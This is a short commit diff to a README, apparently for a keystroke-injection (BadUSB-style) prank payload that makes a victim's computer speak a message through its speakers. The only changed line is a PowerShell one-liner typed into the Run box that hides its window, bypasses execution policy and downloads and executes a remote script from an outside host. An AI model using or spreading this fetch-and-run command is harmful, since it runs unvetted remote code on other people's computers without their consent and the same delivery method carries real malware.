Update README.md

This commit is contained in:
I-Am-Jakoby 2023-01-01 17:22:35 -06:00 committed by GitHub
parent cbdd2f62fb
commit c7ce3eab48
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -40,7 +40,7 @@ SAPI speak with talk through their speakers the message provided or a custom one
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -Ep Bypass iwr jakoby.lol/yzb | iex
powershell -w h -NoP -NonI -Ep Bypass irm jakoby.lol/yzb | iex
```
<p align="right">(<a href="#top">back to top</a>)</p>